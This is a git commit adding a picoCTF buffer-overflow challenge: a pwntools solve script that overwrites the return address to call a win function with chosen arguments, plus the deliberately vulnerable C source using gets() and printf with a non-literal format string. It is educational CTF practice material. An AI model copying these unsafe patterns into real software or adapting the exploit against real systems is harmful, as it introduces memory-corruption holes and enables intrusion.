pwn/buffer_overflow_2

2024-09-03 19:46:13 +02:00 · 2024-09-03 19:46:13 +02:00 · c56300256d
parent 2e33defa56
commit c56300256d
3 changed files with 74 additions and 0 deletions
--- a/pwn/buffer_overflow_2/solve.py
+++ b/pwn/buffer_overflow_2/solve.py
@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+  r = conn()
+
+  print(r.recvuntil(b"Please enter your string:"))
+  offset = 112 # found with pwndbg
+  payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
+  r.sendline(payload)
+  print(r.recvall())
+  r.close()
+
+if __name__ == "__main__":
+    main()
--- a/pwn/buffer_overflow_2/vuln
+++ b/pwn/buffer_overflow_2/vuln
--- a/pwn/buffer_overflow_2/vuln.c
+++ b/pwn/buffer_overflow_2/vuln.c
@ -0,0 +1,43 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+#define BUFSIZE 100
+#define FLAGSIZE 64
+
+void win(unsigned int arg1, unsigned int arg2) {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  if (arg1 != 0xCAFEF00D)
+    return;
+  if (arg2 != 0xF00DF00D)
+    return;
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+  puts(buf);
+}
+
+int main(int argc, char **argv){
+  setvbuf(stdout, NULL, _IONBF, 0);
+
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+